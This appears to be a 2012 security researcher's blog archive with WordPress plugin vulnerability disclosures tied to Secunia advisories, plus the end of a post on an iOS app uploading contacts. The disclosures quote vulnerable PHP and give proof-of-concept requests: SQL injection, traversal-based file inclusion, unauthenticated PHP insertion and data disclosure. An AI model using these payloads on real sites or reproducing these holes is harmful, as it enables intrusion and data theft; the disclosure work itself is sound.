3.3.9 You and Your Applications may not collect user or device data without prior user consent, and then only to provide a service or function that is directly relevant to the use of the Application, or to serve advertising. You may not use analytics software in Your Application to collect and send device data to a third party.
...
17.1  Apps cannot transmit data about a user without obtaining the user’s prior permission and providing the user with access to information about how and where the data will be used.

3.3.9 You and Your Applications may not collect user or device data without prior user consent, and then only to provide a service or function that is directly relevant to the use of the Application, or to serve advertising. You may not use analytics software in Your Application to collect and send device data to a third party.

...

17.1 Apps cannot transmit data about a user without obtaining the user’s prior permission and providing the user with access to information about how and where the data will be used.

I am no lawyer, but I don’t see that this application should have, as per Apples application guidelines, taken this information from my device without permission.

Does this remind anybody else about Path?

Response from vendor
When I contacted Springpad about my concerns in regards to the lack of HTTPS and their use of contact information, they were very prompt in a reply to my concerns, specifically in regards to the lack of HTTPS and the use of contact informations. They explained that the lack of HTTPS was a result of a bug in the build process. A fix for this was being fast-tracked for submission to Apple by the end of the day.

They acknowledged that the application uploaded the emails from the contact book of the device. They noted that the data wasn’t stored, only kept in memory to see if anybody you know uses SpringPad as well. They plan to request for explicit permission in version 3.0.7, which at the time of writing is being tested by their QA.

Overall, they were extremely quick to reply and addressed my concerns quite well, despite having a bad time all at the same time.

July 13, 2012 by Charlie Eriksen

WordPress Paid Memberships Pro information disclosure vulnerability

Advisory
Secunia Advisory SA 49630

Analysis of vulnerability
The page /adminpages/memberslist-csv.php is called through AJAX from admin pages, in order to export a CSV list of paid members on the WordPress site. It sets itself up like this:

//this file is launched via AJAX to get various data from the DB for the stranger_products plugin

//wp includes
define('WP_USE_THEMES', false);
require('../../../../wp-load.php');

//get users	
if(isset($_REQUEST['s']))
	$s = $_REQUEST['s'];
else
	$s = "";

if(isset($_REQUEST['l']))
	$l = $_REQUEST['l'];
else
	$l = false;

//some vars for the search
if(!empty($_REQUEST['pn']))
	$pn = $_REQUEST['pn'];
else
	$pn = 1;

if(!empty($_REQUEST['limit']))
	$limit = $_REQUEST['limit'];
else
	$limit = false;

if($limit)
{	
	$end = $pn * $limit;
	$start = $end - $limit;		
}

//this file is launched via AJAX to get various data from the DB for the stranger_products plugin

//wp includes

define('WP_USE_THEMES', false);

require('../../../../wp-load.php');

//get users

if(isset($_REQUEST['s']))

$s = $_REQUEST['s'];

else

$s = "";

if(isset($_REQUEST['l']))

$l = $_REQUEST['l'];

else

$l = false;

//some vars for the search

if(!empty($_REQUEST['pn']))

$pn = $_REQUEST['pn'];

else

$pn = 1;

if(!empty($_REQUEST['limit']))

$limit = $_REQUEST['limit'];

else

$limit = false;

if($limit)

{

$end = $pn * $limit;

$start = $end - $limit;

}

Due to a lack of validation that the user is logged in and has sufficient rights to do so, we can simply request this page and get a full list of paid members on the blog.

GET /wordpress/wp-content/plugins/paid-memberships-pro/adminpages/memberslist-csv.php HTTP/1.1
Host: 192.168.80.130

1 2	GET /wordpress/wp-content/plugins/paid-memberships-pro/adminpages/memberslist-csv.php HTTP/1.1 Host: 192.168.80.130

July 12, 2012 by Charlie Eriksen

WordPress Global Content Blocks multiple vulnerabilities

Advisory
Secunia Advisory SA 49854

Analysis of gcb_ajax_add.php vulnerability
A part of the admin interface for this plugin allows you to insert a “content block”, which can be used across WordPress to contain reusable blocks of content and PHP code. It does so by making a POST call to /resources/tinymce/gcd_ajax_add.php. Let’s have a quick look at that to see how it works.

require_once('../../../../../wp-load.php');
global $wpdb;

if(!isset($_POST["name"]) || !isset($_POST["content"])) {die("invalid call!");}

$name = $_POST["name"];
$description = mysql_real_escape_string(htmlspecialchars($_POST['description']));
$type = mysql_real_escape_string(htmlspecialchars($_POST['type']));
$value = mysql_real_escape_string(htmlspecialchars($_POST['content']));

if(!strlen($name) || !strlen($value)) {die("invalid call!");}

$available_types = array(
            "other"=>array("vname"=>"General","img"=>"gcb.png","help"=>"Content block"),
            "adsense"=>array("vname"=>"Adsense","img"=>"adsense.png","help"=>"Adsense code"),
            "code"=>array("vname"=>"Code","img"=>"code.png","help"=>"Programming code"),
            "form"=>array("vname"=>"Form","img"=>"form.png","help"=>"General form"),
            "html"=>array("vname"=>"HTML","img"=>"html.png","help"=>"Raw HTML code"),
            "iframe"=>array("vname"=>"Iframe","img"=>"iframe.png","help"=>"Iframe code"),
            "optin"=>array("vname"=>"Opt-In Form","img"=>"optin.png","help"=>"Opt-In form code"),
            "php"=>array("vname"=>"PHP Code","img"=>"php.png","help"=>"PHP code (without <!--?php, <?, ?--> tags)"),
        );

$wpdb->query("insert into ".$wpdb->prefix . "gcb (name,description,value,type) VALUES ('".$name."','".$description."','".$value."','".$type."')");

$inserted_id = mysql_insert_id();

$return = array(
"id"=>$inserted_id,
"name"=>$name,
"img"=>$available_types[$type]["img"]
);

echo json_encode($return);die();

require_once('../../../../../wp-load.php');

global $wpdb;

if(!isset($_POST["name"]) || !isset($_POST["content"])) {die("invalid call!");}

$name = $_POST["name"];

$description = mysql_real_escape_string(htmlspecialchars($_POST['description']));

$type = mysql_real_escape_string(htmlspecialchars($_POST['type']));

$value = mysql_real_escape_string(htmlspecialchars($_POST['content']));

if(!strlen($name) || !strlen($value)) {die("invalid call!");}

$available_types = array(

"other"=>array("vname"=>"General","img"=>"gcb.png","help"=>"Content block"),

"adsense"=>array("vname"=>"Adsense","img"=>"adsense.png","help"=>"Adsense code"),

"code"=>array("vname"=>"Code","img"=>"code.png","help"=>"Programming code"),

"form"=>array("vname"=>"Form","img"=>"form.png","help"=>"General form"),

"html"=>array("vname"=>"HTML","img"=>"html.png","help"=>"Raw HTML code"),

"iframe"=>array("vname"=>"Iframe","img"=>"iframe.png","help"=>"Iframe code"),

"optin"=>array("vname"=>"Opt-In Form","img"=>"optin.png","help"=>"Opt-In form code"),

"php"=>array("vname"=>"PHP Code","img"=>"php.png","help"=>"PHP code (without  tags)"),

);

$wpdb->query("insert into ".$wpdb->prefix . "gcb (name,description,value,type) VALUES ('".$name."','".$description."','".$value."','".$type."')");

$inserted_id = mysql_insert_id();

$return = array(

"id"=>$inserted_id,

"name"=>$name,

"img"=>$available_types[$type]["img"]

);

echo json_encode($return);die();

So it starts by doing some initializations, validate that all the input is there that it needs, and do mostly best-practice sanitization. It then inserts the value into a database and returns the same value back in json format. The problem here is that at no point has the script checked that the calling user is logged in, and is an admin(This is important because it allows for inserting PHP code, which could cause an arbitrary code execution).

It does sanitization of all values but the name, but as it turns out this is all output encoded in the admin interface. But we’re still able to insert arbitrary content into the table without authentication, which could be bad due to the possibility of PHP code being inserted. This can be exploited like this:

POST /wordpress/wp-content/plugins/global-content-blocks/resources/tinymce/gcb_ajax_add.php HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 129

name=My malicious request&content=echo 'Hello buddy', nice day';&type=php&description=This is really not malicious code, I swear.

POST /wordpress/wp-content/plugins/global-content-blocks/resources/tinymce/gcb_ajax_add.php HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 129

name=My malicious request&content=echo 'Hello buddy', nice day';&type=php&description=This is really not malicious code, I swear.

Analysis of gdbvalue.php vulnerability
Another part of the admin interface is used to fetch the value of a content block, i.e the php code or other trip of content that may be reused on pages. In cases where it is php code, source code disclosure is a concern. The next 3 vulnerabilities allows for disclosure of block contents. The first one is in [/resources/tinymce/gcbvalue.php](http://plugins.svn.wordpress.org/global-content-blocks/tags/1.5.1/resources/tinymce/gcbvalue.php):

if(!isset($_POST["id"]) || intval($_POST["id"])get_row("select value from ".$wpdb->prefix."gcb where id=".$gcb_id);
if($val!==null) {
    echo stripslashes(htmlspecialchars_decode($val->value));
}
die();

if(!isset($_POST["id"]) || intval($_POST["id"])get_row("select value from ".$wpdb->prefix."gcb where id=".$gcb_id);

if($val!==null) {

echo stripslashes(htmlspecialchars_decode($val->value));

}

die();

We see some validation of the input id to prevent SQL injection, and then a SQL query which will be used to print out the value(Code/markup) to the page. There is no validation that the caller is an admin, which means we can fetch the value(Which can be PHP code) with a simple HTTP request

POST /wordpress/wp-content/plugins/global-content-blocks/resources/tinymce/gcbvalue.php HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 4

id=1

POST /wordpress/wp-content/plugins/global-content-blocks/resources/tinymce/gcbvalue.php HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 4

id=1

This will disclose the contents of the block, which may contain PHP code that may contain secrets.

Analysis of gcb_export.php vulnerability
A feature that the admin panel of this plugin is that it will export the block defined for easy import into another blog. It does so by calling /gcb/gcb_export.php, which forces the browser to download a .gcb file which contains base64 encoded content.

if(!isset($_GET["gcb"])) (die("Please select some values"));
require_once('../../../../wp-load.php');
global $wpdb;

$ids = explode(";",$_GET["gcb"]);
$final_text = array();

foreach($ids as $id) {
    if(intval($id)>0) {
        $entry = $wpdb->get_row("select * from ".$wpdb->prefix."gcb where id=".intval(mysql_real_escape_string($id)));
        $final_text[] =
        base64_encode($entry->name)."".
        base64_encode($entry->description)."".
        base64_encode($entry->value)."".
        base64_encode($entry->type);        
    }
}

if(!isset($_GET["gcb"])) (die("Please select some values"));

require_once('../../../../wp-load.php');

global $wpdb;

$ids = explode(";",$_GET["gcb"]);

$final_text = array();

foreach($ids as $id) {

if(intval($id)>0) {

$entry = $wpdb->get_row("select * from ".$wpdb->prefix."gcb where id=".intval(mysql_real_escape_string($id)));

$final_text[] =

base64_encode($entry->name)."".

base64_encode($entry->description)."".

base64_encode($entry->value)."".

base64_encode($entry->type);

}

Again there is a lack of validation that the user is logged in and has sufficient privileges to view this data normally. And because it may contain php code that is sensitive, it offers a source code disclosure vulnerability we can exploit like this. Note the semi-colon separated id list, which makes this very handy.

GET /wordpress/wp-content/plugins/global-content-blocks/gcb/gcb_export.php?gcb=1;2;3 HTTP/1.1
Host: 192.168.80.130

1 2	GET /wordpress/wp-content/plugins/global-content-blocks/gcb/gcb_export.php?gcb=1;2;3 HTTP/1.1 Host: 192.168.80.130

July 10, 2012 by Charlie Eriksen

WordPress Sendit Newsletter plugin multiple SQL injection

Advisory
Secunia Advisory SA 49506

Analysis
A SQL injection vulnerability exists in the ajax.php file of the Sendit Newsletter plugin for WordPress, which is used for setting the subscribed or unsubscribed flag on an email.

By passing in an arbitrary key-pair value, we see that because of line 9, it will use the key-pair for the SET statement on line 17/27 without any validation. It will also explode(Split into an array) the ID value on line 10 and 11 and put the “ID” into a variable later used, without validating that it is an integer. This is then also used on line 17/27, and is also exploitable.

include("../../../wp-blog-header.php");
status_header(200);
nocache_headers();
require_once 'libs/actions.php';
global $wpdb;
//print_r($_POST);
//let me parse
foreach($_POST as $k=>$v):
    $id= explode("-", $_POST['id']);
    $id=$id[1];

    if($k!='id'):
        if($k!='email'):
            //serializer update
            $subscriber_info=json_encode($_POST);
            $update=$wpdb->query("update ".SENDIT_EMAIL_TABLE." set $k = '$v' where id_email = $id");     
            //$update="update ".SENDIT_EMAIL_TABLE." set subscriber_info = '$subscriber_info' where id_email = $id";
            if($v=='y') { $confirmed='confirmed'; $style='vertical-align:middle; background:#E4FFCF;'; } 
            elseif($v=='d') {$confirmed='unsubscribed'; $style='vertical-align:middle; background:#fd919b';} 
            elseif($v=='n') {$confirmed='not confirmed'; $style='vertical-align:middle; background:#fffbcc;';} 
            else {}
            echo '<div style="'.$style.'display:block;height:35px">';
                echo $confirmed;
            echo '</div>';
        else:   
            $update=$wpdb->query("update ".SENDIT_EMAIL_TABLE." set $k = '$v' where id_email = $id");

            echo $v;
        endif;
    endif;

include("../../../wp-blog-header.php");

status_header(200);

nocache_headers();

require_once 'libs/actions.php';

global $wpdb;

//print_r($_POST);

//let me parse

foreach($_POST as $k=>$v):

$id= explode("-", $_POST['id']);

$id=$id[1];

if($k!='id'):

if($k!='email'):

//serializer update

$subscriber_info=json_encode($_POST);

$update=$wpdb->query("update ".SENDIT_EMAIL_TABLE." set $k = '$v' where id_email = $id");

//$update="update ".SENDIT_EMAIL_TABLE." set subscriber_info = '$subscriber_info' where id_email = $id";

if($v=='y') { $confirmed='confirmed'; $style='vertical-align:middle; background:#E4FFCF;'; }

elseif($v=='d') {$confirmed='unsubscribed'; $style='vertical-align:middle; background:#fd919b';}

elseif($v=='n') {$confirmed='not confirmed'; $style='vertical-align:middle; background:#fffbcc;';}

else {}

echo '<div style="'.$style.'display:block;height:35px">';

echo $confirmed;

echo '</div>';

else:

$update=$wpdb->query("update ".SENDIT_EMAIL_TABLE." set $k = '$v' where id_email = $id");

echo $v;

endif;

Because this call does not require any sort of authentication, we can make a simple POST request to exploit this and inject SQL:

POST /wordpress/wp-content/plugins/sendit/ajax.php? HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

id=1-52179 OR 1 = 1 ;-3&thiskeygoesintothequery=settingthevaluetothis

POST /wordpress/wp-content/plugins/sendit/ajax.php? HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 71

id=1-52179 OR 1 = 1 ;-3&thiskeygoesintothequery=settingthevaluetothis

July 10, 2012 by Charlie Eriksen

WordPress A Page Flip Book plugin local file inclusion vulnerability

Advisory
Secunia Advisory SA 49505

Analysis
A page flip book for WordPress allows for different languages to be used. This is toggled by posting “pageflipbook_language” to the blog, which will update an option and then include the appropiate language. This is done in the main file, pageflipbook.php, which is always included.

We can see that it checks if “pageflipbook_language” is included in a POST parameter on line 30, it will update the option on the blog, otherwise it will pull the language value from the option and put that into the variable. This value is supposed to be the name of a php file. After that, it will include the chosen language file on line 47.

if ((isset($_POST['pageflipbook_language'])) AND ($_POST['pageflipbook_language']!='')) {
    $pageflipbook_language = $_POST['pageflipbook_language'];
    update_option('pageflipbook_language', $pageflipbook_language);
}
else
    $pageflipbook_language = get_option('pageflipbook_language');
if ($pageflipbook_language == '') $pageflipbook_language = 'EN_en.php';

define ('SITE_URL', get_option('siteurl') );
define ('PAGEFLIPBOOK_UPLOAD_DIR', ABSPATH . '/wp-content/plugins/wppageflip/');
define ('PAGEFLIPBOOK_UPLOAD_URL', SITE_URL . '/wp-content/plugins/wppageflip/');
define ('PAGEFLIPBOOK_ICONES_DIR', '../wp-content/plugins/wppageflip/images/');
define ('PAGEFLIPBOOK_PLUGIN_URL', SITE_URL . '/wp-content/plugins/wppageflip/');

require_once (ABSPATH.'wp-includes/pluggable.php');
include (PAGEFLIPBOOK_UPLOAD_DIR. 'functions.php');
include (PAGEFLIPBOOK_UPLOAD_DIR. 'quicktags.php');
include (PAGEFLIPBOOK_UPLOAD_DIR. 'languages/'. $pageflipbook_language);

if ((isset($_POST['pageflipbook_language'])) AND ($_POST['pageflipbook_language']!='')) {

$pageflipbook_language = $_POST['pageflipbook_language'];

update_option('pageflipbook_language', $pageflipbook_language);

}

else

$pageflipbook_language = get_option('pageflipbook_language');

if ($pageflipbook_language == '') $pageflipbook_language = 'EN_en.php';

define ('SITE_URL', get_option('siteurl') );

define ('PAGEFLIPBOOK_UPLOAD_DIR', ABSPATH . '/wp-content/plugins/wppageflip/');

define ('PAGEFLIPBOOK_UPLOAD_URL', SITE_URL . '/wp-content/plugins/wppageflip/');

define ('PAGEFLIPBOOK_ICONES_DIR', '../wp-content/plugins/wppageflip/images/');

define ('PAGEFLIPBOOK_PLUGIN_URL', SITE_URL . '/wp-content/plugins/wppageflip/');

require_once (ABSPATH.'wp-includes/pluggable.php');

include (PAGEFLIPBOOK_UPLOAD_DIR. 'functions.php');

include (PAGEFLIPBOOK_UPLOAD_DIR. 'quicktags.php');

include (PAGEFLIPBOOK_UPLOAD_DIR. 'languages/'. $pageflipbook_language);

But because there is no validation that the file is a valid language file and there is no directory transversal, we can do a local file inclusion attack on this:

POST /wordpress/ HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

pageflipbook_language=../../../../../../../../dog.php

POST /wordpress/ HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 55

pageflipbook_language=../../../../../../../../dog.php

July 10, 2012 by Charlie Eriksen

WordPress Symposium plugin multiple SQL injection vulnerabilities

Advisory
Secunia Advisory SA 49534

Analysis of group_menu_settings vulnerability
The group_menu_settings function in /ajax/symposium_group_functions.php allows an user to show settings for a group. The function takes a POST parameter called “uid1″, which is used for a sql query.

// Show Group Settings
if ($_POST['action'] == 'group_menu_settings') {

    global $wpdb, $current_user;

    $gid = $_POST['uid1'];

    $group = $wpdb->get_row($wpdb->prepare("SELECT * FROM ".$wpdb->prefix . 'symposium_groups WHERE gid='.$gid));

// Show Group Settings

if ($_POST['action'] == 'group_menu_settings') {

global $wpdb, $current_user;

$gid = $_POST['uid1'];

$group = $wpdb->get_row($wpdb->prepare("SELECT * FROM ".$wpdb->prefix . 'symposium_groups WHERE gid='.$gid));

However due to an incorrect use of wpdb->prepare, the groupID is never sanitized. Also the function does not check user credentials until line 616, and as such allows for a SQL injection through a simple POST request like this:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_group_functions.php
HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

action=group_menu_settings&uid1=353535 OR 1 = 1

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_group_functions.php

HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 49

action=group_menu_settings&uid1=353535 OR 1 = 1

Analysis of loadComposeForm vulnerability
The loadComposeForm function in /ajax/symposium_mail_functions.php is used to fetch the display name of an userID through a simple SQL query like this:

// Load Compose Forum
if ($_POST['action'] == 'loadComposeForm') {

    if (is_user_logged_in()) {

        $mail_to = $_POST["mail_to"];
        $recipient = $wpdb->get_var("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$mail_to);

        echo $recipient;

// Load Compose Forum

if ($_POST['action'] == 'loadComposeForm') {

if (is_user_logged_in()) {

$mail_to = $_POST["mail_to"];

$recipient = $wpdb->get_var("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$mail_to);

echo $recipient;

It first checks if the user is logged in, and then takes to mail_to POST parameter and append it to the query. But because there is no validation that the mail_to variable is in fact an integer, we can make a POST request if we have an authentication cookie, and exploit this SQL injection vulnerability:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_mail_functions.php HTTP/1.1
Host: 192.168.80.130
Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7Ccb77d4fd4fcd2448f70ceefc746f38fe;  wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7C486bd8321f9973799f837e666abb40f4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

action=loadComposeForm&mail_to=1335353 UNION SELECT @@version

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_mail_functions.php HTTP/1.1

Host: 192.168.80.130

Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7Ccb77d4fd4fcd2448f70ceefc746f38fe; wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7C486bd8321f9973799f837e666abb40f4;

Content-Type: application/x-www-form-urlencoded

Content-Length: 63

action=loadComposeForm&mail_to=1335353 UNION SELECT @@version

Analysis of getReply vulnerability
The getReply function in /ajax/symposium_mail_functions.php is used to fetch the display name of a recipient and message information about a particular mail.

// Get reply info
if ($_POST['action'] == 'getReply') {

    if (is_user_logged_in()) {

        $mid = $_POST["mail_id"];
        $recipient_id = $_POST["recipient_id"];

        $recipient = $wpdb->get_var("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$recipient_id);
        $mail_message = $wpdb->get_row("SELECT m.*, u.display_name FROM ".$wpdb->base_prefix."symposium_mail m LEFT JOIN ".$wpdb->base_prefix."users u ON m.mail_from = u.ID WHERE mail_mid = ".$mid);

// Get reply info

if ($_POST['action'] == 'getReply') {

if (is_user_logged_in()) {

$mid = $_POST["mail_id"];

$recipient_id = $_POST["recipient_id"];

$recipient = $wpdb->get_var("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$recipient_id);

$mail_message = $wpdb->get_row("SELECT m.*, u.display_name FROM ".$wpdb->base_prefix."symposium_mail m LEFT JOIN ".$wpdb->base_prefix."users u ON m.mail_from = u.ID WHERE mail_mid = ".$mid);

It first checks if the user is logged in, and then takes to mail_id and recipient_id POST parameter and stitches those into 2 SQL queries using simple concatenation. However due to a lack of validation of the parameters being integers, we can exploit this:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_mail_functions.php HTTP/1.1
Host: 192.168.80.130
Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7Ccb77d4fd4fcd2448f70ceefc746f38fe;  wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7C486bd8321f9973799f837e666abb40f4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

action=getReply&recipient_id=1353533 UNION SELECT @@version&mail_id=335353 UNION SELECT @@version, user(), system_user(), database(), @@hostname, @@datadir, 7, 8, 9, 10

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_mail_functions.php HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 162

action=getReply&recipient_id=1353533 UNION SELECT @@version&mail_id=335353 UNION SELECT @@version, user(), system_user(), database(), @@hostname, @@datadir, 7, 8, 9, 10

Analysis of symposium_openchat vulnerability
The symposium_openchat function in /ajax/symposium_bar_functions.php allows for opening a chat with another user on the site. It does so by getting the chat_to POST parameter, which si expected to be an integer, and then checks if that chat already exists:

// Open chat
if ($_POST['action'] == 'symposium_openchat') {

    global $wpdb, $current_user;

    if (is_user_logged_in()) {

        $chat_to = $_POST['chat_to'];
        $chat_from = $current_user->ID;
        $r = ';

        // check to see if they are already chatting
        if ($wpdb->query( $wpdb->prepare("SELECT chid FROM ".$wpdb->base_prefix."symposium_chat WHERE (chat_from = ".$chat_from." AND chat_to = ".$chat_to.") OR (chat_from = ".$chat_to." AND chat_to = ".$chat_from.")"))) {

            // clear the closed flag
            $sql = "DELETE FROM ".$wpdb->base_prefix."symposium_chat WHERE chat_message = '[closed-%d]' AND ( (chat_from = %d AND chat_to = %d) OR (chat_from = %d AND chat_to = %d) )";
            $wpdb->query( $wpdb->prepare($sql, $chat_from, $chat_from, $chat_to, $chat_to, $chat_from) );
            $r .= $chat_to;

        } else {

            if ( $rows_affected = $wpdb->insert( $wpdb->base_prefix . "symposium_chat", array( 
                'chat_to' => $chat_to, 
                'chat_from' => $chat_from, 
                'chat_message' => '[start]',
                'chat_timestamp' => date("Y-m-d H:i:s") 
            ) ) ) {

                $display_name = $wpdb->get_var($wpdb->prepare("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$chat_to));
                $r .= "OK[split]".$chat_to."[split]".$display_name;

            }
        }

        echo $r;

// Open chat

if ($_POST['action'] == 'symposium_openchat') {

global $wpdb, $current_user;

if (is_user_logged_in()) {

$chat_to = $_POST['chat_to'];

$chat_from = $current_user->ID;

$r = ';

// check to see if they are already chatting

if ($wpdb->query( $wpdb->prepare("SELECT chid FROM ".$wpdb->base_prefix."symposium_chat WHERE (chat_from = ".$chat_from." AND chat_to = ".$chat_to.") OR (chat_from = ".$chat_to." AND chat_to = ".$chat_from.")"))) {

// clear the closed flag

$sql = "DELETE FROM ".$wpdb->base_prefix."symposium_chat WHERE chat_message = '[closed-%d]' AND ( (chat_from = %d AND chat_to = %d) OR (chat_from = %d AND chat_to = %d) )";

$wpdb->query( $wpdb->prepare($sql, $chat_from, $chat_from, $chat_to, $chat_to, $chat_from) );

$r .= $chat_to;

} else {

if ( $rows_affected = $wpdb->insert( $wpdb->base_prefix . "symposium_chat", array(

'chat_to' => $chat_to,

'chat_from' => $chat_from,

'chat_message' => '[start]',

'chat_timestamp' => date("Y-m-d H:i:s")

) ) ) {

$display_name = $wpdb->get_var($wpdb->prepare("SELECT display_name FROM ".$wpdb->base_prefix."users WHERE ID = ".$chat_to));

$r .= "OK[split]".$chat_to."[split]".$display_name;

}

echo $r;

If you’re logged in and the chat does not exist, on line 572 it will then insert a new chat and select the display name from the user table, and incorrectly use the wpdb_prepare function. By rather concatenating the ID in instead of passing it as a parameter, we can now select data out of the database like this:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_bar_functions.php HTTP/1.1
Host: 192.168.80.130
Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7Ccb77d4fd4fcd2448f70ceefc746f38fe;  wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7C486bd8321f9973799f837e666abb40f4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

action=symposium_openchat&chat_to=3535 UNION SELECT @@version

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_bar_functions.php HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 63

action=symposium_openchat&chat_to=3535 UNION SELECT @@version

Analysis of getEditDetails vulnerability
The getEditDetails function in /ajax/symposium_forum_functions.php gets the contents of a post for the edit page.

// AJAX function to get topic details for editing
if ($_POST['action'] == 'getEditDetails') {

    if (is_user_logged_in()) {

        $tid = $_POST['tid'];   

        $details = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix.'symposium_topics'." WHERE tid = ".$tid);

// AJAX function to get topic details for editing

if ($_POST['action'] == 'getEditDetails') {

if (is_user_logged_in()) {

$tid = $_POST['tid'];

$details = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix.'symposium_topics'." WHERE tid = ".$tid);

It checks if you’re logged in, and then takes the tid POST parameter and concatenates it into a SQL query without casting it to an integer or otherwise sanitizes it. This means we can exploit it by making a request like this:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_forum_functions.php HTTP/1.1
Host: 192.168.80.130
Cookie: wordpress_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7Ccb77d4fd4fcd2448f70ceefc746f38fe;  wordpress_logged_in_f3e14e7fde6969eb515c450fed50d259=admin%7C1340114858%7C486bd8321f9973799f837e666abb40f4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 149

action=getEditDetails&tid=2323 UNION SELECT system_user(), 2, @@datadir, @@version, user(), 6, 7, @@hostname, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18

POST /wordpress/wp-content/plugins/wp-symposium/ajax/symposium_forum_functions.php HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 149

action=getEditDetails&tid=2323 UNION SELECT system_user(), 2, @@datadir, @@version, user(), 6, 7, @@hostname, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18

Multiple blind injection spots in /ajax/symposium_mail_functions.php
On line 94, 101, 208, 210, 274, 276 in /ajax/symposium_mail_functions.php there is also a lack of validation of integer inputs, which allows for arbitrary query execution.

July 3, 2012 by Charlie Eriksen

WordPress Quotes Collection plugin cross-site request forgery vulnerability

Advisory
Secunia Advisory SA 49653

Analysis
A type of vulnerability that seems to be fairly common is CSRF. You can obviously speculate as to why, but I found this interesting one. I normally won’t publish CSRF vulnerabilities, but there are cases where they can abuse the inherent trust that is put in an admin to not attempt to exploit the blog readers.

In this case, because the admin pages did not make use of nonces, we are able to craft a page which will make the user make a GET request with a XSS payload, which will at no point be sanitized besides being escaped for inserting into the database.

function quotescollection_addquote($quote, $author = "", $source = "", $tags = "", $public = 'yes')
{
    if(!$quote) return __('Nothing added to the database.', 'quotes-collection');
    global $wpdb;
    $table_name = $wpdb->prefix . "quotescollection";
    if($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name) 
        return __('Database table not found', 'quotes-collection');
    else //Add the quote data to the database
    {

        $quote = stripslashes($quote);
        $author = stripslashes($author);    
        $source = stripslashes($source);    
        $tags = stripslashes($tags);

        $quote = "'".$wpdb->escape($quote)."'";
        $author = $author?"'".$wpdb->escape($author)."'":"NULL";
        $source = $source?"'".$wpdb->escape($source)."'":"NULL";
        $tags = explode(',', $tags);
        foreach ($tags as $key => $tag)
            $tags[$key] = trim($tag);
        $tags = implode(',', $tags);
        $tags = $tags?"'".$wpdb->escape($tags)."'":"NULL";
        if(!$public) $public = "'no'";
        else $public = "'yes'";
        $insert = "INSERT INTO " . $table_name .
            "(quote, author, source, tags, public, time_added)" .
            "VALUES ({$quote}, {$author}, {$source}, {$tags}, {$public}, NOW())";
        $results = $wpdb->query( $insert );
        if(FALSE === $results)
            return __('There was an error in the MySQL query', 'quotes-collection');
        else
            return __('Quote added', 'quotes-collection');
   }
}

function quotescollection_addquote($quote, $author = "", $source = "", $tags = "", $public = 'yes')

{

if(!$quote) return __('Nothing added to the database.', 'quotes-collection');

global $wpdb;

$table_name = $wpdb->prefix . "quotescollection";

if($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name)

return __('Database table not found', 'quotes-collection');

else //Add the quote data to the database

{

$quote = stripslashes($quote);

$author = stripslashes($author);

$source = stripslashes($source);

$tags = stripslashes($tags);

$quote = "'".$wpdb->escape($quote)."'";

$author = $author?"'".$wpdb->escape($author)."'":"NULL";

$source = $source?"'".$wpdb->escape($source)."'":"NULL";

$tags = explode(',', $tags);

foreach ($tags as $key => $tag)

$tags[$key] = trim($tag);

$tags = implode(',', $tags);

$tags = $tags?"'".$wpdb->escape($tags)."'":"NULL";

if(!$public) $public = "'no'";

else $public = "'yes'";

$insert = "INSERT INTO " . $table_name .

"(quote, author, source, tags, public, time_added)" .

"VALUES ({$quote}, {$author}, {$source}, {$tags}, {$public}, NOW())";

$results = $wpdb->query( $insert );

if(FALSE === $results)

return __('There was an error in the MySQL query', 'quotes-collection');

else

return __('Quote added', 'quotes-collection');

}

